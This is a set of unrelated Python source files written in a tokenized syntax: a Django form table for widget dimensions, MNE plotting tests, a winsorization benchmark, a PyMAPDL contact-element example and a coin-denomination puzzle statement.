<import_stmt>floppyforms<as>forms<import_from_stmt>django.forms.models modelformset_factory<import_from_stmt>django.utils.translation ugettext_lazy<as>_<import_from_stmt>horizon tables<import_from_stmt>horizon.tables.formset FormsetDataTable FormsetRow<import_from_stmt>leonardo.module.web.models WidgetDimension<class_stmt>Slider(forms.RangeInput)<block_start>min=1<line_sep>max=12<line_sep>step=1<line_sep>template_name='floppyforms/slider.html'<block_end><class_stmt>OffsetSlider(Slider)<block_start>min=0<block_end><class_stmt>HeightSlider(OffsetSlider)<block_start>max=24<block_end><class_stmt>WidgetDimensionForm(forms.ModelForm)<block_start>width=forms.CharField(widget=Slider() initial=12)<line_sep>height=forms.CharField(widget=HeightSlider() initial=0)<line_sep>offset=forms.CharField(widget=OffsetSlider() initial=0)<def_stmt>__init__ self *args **kw<block_start>super(WidgetDimensionForm self).__init__(*args **kw)<line_sep>self.fields['size'].initial='xs'<block_end><class_stmt>Meta<block_start>model=WidgetDimension<line_sep>exclude=tuple()<block_end><block_end>WidgetDimensionFormset=modelformset_factory(WidgetDimension form=WidgetDimensionForm can_delete=<true> extra=1)<class_stmt>CustomFormsetRow(FormsetRow)<block_start><def_stmt>__init__ self column datum form<block_start>self.form=form<line_sep>super(CustomFormsetRow self).__init__(column datum form)<line_sep># add initial <if_stmt><not>datum<and>column.data<block_start><try_stmt><block_start>previous=column.data[0]<line_sep>self.form.fields['widget_type'].initial=previous.widget_type<line_sep>self.form.fields['widget_id'].initial=previous.widget_id<line_sep>self.form.fields['id'].initial=previous.id+1<block_end><except_stmt>Exception<block_start><pass><block_end><block_end><block_end><block_end><class_stmt>WidgetDimensionTable(FormsetDataTable)<block_start>formset_class=WidgetDimensionFormset<def_stmt>get_formset self<block_start>"""Provide the formset corresponding to this DataTable. Use this to validate the formset and to get the submitted data back. """<if_stmt>self.widget<block_start>queryset=self.widget.dimensions<block_end><else_stmt><block_start>queryset=WidgetDimension.objects.none()<block_end><if_stmt>self._formset<is><none><block_start>self._formset=self.formset_class(self.request.POST<or><none> initial=self._get_formset_data() prefix=self._meta.name queryset=queryset)<block_end><return>self._formset<block_end><def_stmt>__init__ self *args **kwargs<block_start>self._meta.row_class=CustomFormsetRow<line_sep>self.widget=kwargs.pop('widget' <none>)<line_sep>super(WidgetDimensionTable self).__init__(*args **kwargs)<block_end>widget_id=tables.Column('widget_id' hidden=<true>)<line_sep>widget_type=tables.Column('widget_type' hidden=<true>)<line_sep>size=tables.Column('size' verbose_name=_('Size'))<line_sep>width=tables.Column('width' verbose_name=('Width'))<line_sep>height=tables.Column('height' verbose_name=_('Height'))<line_sep>offset=tables.Column('offset' verbose_name=_('Offset'))<line_sep>name='dimensions'<class_stmt>Meta<block_start>name='dimensions'<line_sep>table_name='Dimensions'<block_end><block_end>
# Authors: <NAME> <<EMAIL>> # # License: Simplified BSD <import_stmt>pytest<import_from_stmt>mne.viz._mpl_figure _psd_figure<import_from_stmt>mne.viz._figure _get_browser<def_stmt>test_browse_figure_constructor <block_start>"""Test error handling in MNEBrowseFigure constructor."""<with_stmt>pytest.raises(TypeError match='an instance of Raw, Epochs, or ICA')<block_start>_get_browser(inst='foo')<block_end><block_end><def_stmt>test_psd_figure_constructor <block_start>"""Test error handling in MNELineFigure constructor."""<with_stmt>pytest.raises(TypeError match='an instance of Raw or Epochs, got')<block_start>_psd_figure('foo' *((<none> )<times>20))<block_end><block_end>
# -*- coding: utf-8 -*- """ Created on 2017-4-25 @author: cheng.li """<import_stmt>datetime<as>dt<import_stmt>numpy<as>np<import_stmt>pandas<as>pd<import_from_stmt>alphamind.data.winsorize winsorize_normal<def_stmt>benchmark_winsorize_normal n_samples:int n_features:int n_loops:int<arrow><none><block_start>print("-"<times>60)<line_sep>print("Starting winsorize normal benchmarking")<line_sep>print("Parameters(n_samples: {0}, n_features: {1}, n_loops: {2})".format(n_samples n_features n_loops))<line_sep>num_stds=2<line_sep>x=np.random.randn(n_samples n_features)<line_sep>start=dt.datetime.now()<for_stmt>_ range(n_loops)<block_start>_=winsorize_normal(x num_stds)<block_end>impl_model_time=dt.datetime.now()-start<line_sep>print('{0:20s}: {1}'.format('Implemented model' impl_model_time))<def_stmt>impl x<block_start>std_values=x.std(axis=0)<line_sep>mean_value=x.mean(axis=0)<line_sep>lower_bound=mean_value-num_stds<times>std_values<line_sep>upper_bound=mean_value+num_stds<times>std_values<line_sep>res=np.where(x<g>upper_bound upper_bound x)<line_sep>res=np.where(res<l>lower_bound lower_bound res)<line_sep><return>res<block_end>start=dt.datetime.now()<for_stmt>_ range(n_loops)<block_start>_=impl(x)<block_end>benchmark_model_time=dt.datetime.now()-start<line_sep>print('{0:20s}: {1}'.format('Benchmark model' benchmark_model_time))<block_end><def_stmt>benchmark_winsorize_normal_with_group n_samples:int n_features:int n_loops:int n_groups:int<arrow><none><block_start>print("-"<times>60)<line_sep>print("Starting winsorize normal with group-by values benchmarking")<line_sep>print("Parameters(n_samples: {0}, n_features: {1}, n_loops: {2}, n_groups: {3})".format(n_samples n_features n_loops n_groups))<line_sep>num_stds=2<line_sep>x=np.random.randn(n_samples n_features)<line_sep>groups=np.random.randint(n_groups size=n_samples)<line_sep>start=dt.datetime.now()<for_stmt>_ range(n_loops)<block_start>_=winsorize_normal(x num_stds groups=groups)<block_end>impl_model_time=dt.datetime.now()-start<line_sep>print('{0:20s}: {1}'.format('Implemented model' impl_model_time))<def_stmt>impl x<block_start>std_values=x.std(axis=0)<line_sep>mean_value=x.mean(axis=0)<line_sep>lower_bound=mean_value-num_stds<times>std_values<line_sep>upper_bound=mean_value+num_stds<times>std_values<line_sep>res=np.where(x<g>upper_bound upper_bound x)<line_sep>res=np.where(res<l>lower_bound lower_bound res)<line_sep><return>res<block_end>start=dt.datetime.now()<for_stmt>_ range(n_loops)<block_start>_=pd.DataFrame(x).groupby(groups).transform(impl)<block_end>benchmark_model_time=dt.datetime.now()-start<line_sep>print('{0:20s}: {1}'.format('Benchmark model' benchmark_model_time))<block_end><if_stmt>__name__<eq>'__main__'<block_start>benchmark_winsorize_normal(3000 10 1000)<line_sep>benchmark_winsorize_normal_with_group(3000 10 1000 30)<block_end>
""" .. _ref_contact_example: Contact Element Example ~~~~~~~~~~~~~~~~~~~~~~~ This example demonstrates how to create contact elements for general contact. Begin by launching MAPDL. """<import_from_stmt>ansys.mapdl core<as>pymapdl<line_sep>mapdl=pymapdl.launch_mapdl()<line_sep>############################################################################### # Enter the pre-processor, create a block and mesh it with tetrahedral # elements. # mapdl.prep7()<line_sep>vnum0=mapdl.block(0 1 0 1 0 0.5)<line_sep>mapdl.et(1 187)<line_sep>mapdl.esize(0.1)<line_sep>mapdl.vmesh(vnum0)<line_sep>mapdl.eplot()<line_sep>############################################################################### # Second a volume block above the existing block and mesh it with # quadratic hexahedral elements. Ensure that these blocks do not # touch by starting it slightly higher than the existing block. # # Note how these two blocks do not touch and the mesh is non-conformal. mapdl.esize(0.09)<line_sep>mapdl.et(2 186)<line_sep>mapdl.type(2)<line_sep>vnum1=mapdl.block(0 1 0 1 0.50001 1)<line_sep>mapdl.vmesh(vnum1)<line_sep>mapdl.eplot()<line_sep>############################################################################### # Select all the elements at the intersection between the two blocks # and generate contact elements. mapdl.nsel("s" "loc" "z" 0.5 0.50001)<line_sep>mapdl.esln("s")<line_sep>output=mapdl.gcgen("NEW" splitkey="SPLIT" selopt="SELECT")<line_sep>print(output)<line_sep>############################################################################### # Plot the contact element pairs. Note from the command output above # that the section IDs are 5 and 6. # # Here, we plot the element mesh as a wire-frame to show that the # contact pairs overlap. mapdl.esel("S" "SEC" vmin=5 vmax=6)<line_sep>mapdl.eplot(style="wireframe" line_width=3)<line_sep>
"""This problem was asked by Snapchat. You are given an array of length N, where each element i represents the number of ways we can produce i units of change. For example, [1, 0, 1, 1, 2] would indicate that there is only one way to make 0, 2, or 3 units, and two ways of making 4 units. Given such an array, determine the denominations that must be in use. In the case above, for example, there must be coins with value 2, 3, and 4. """<line_sep>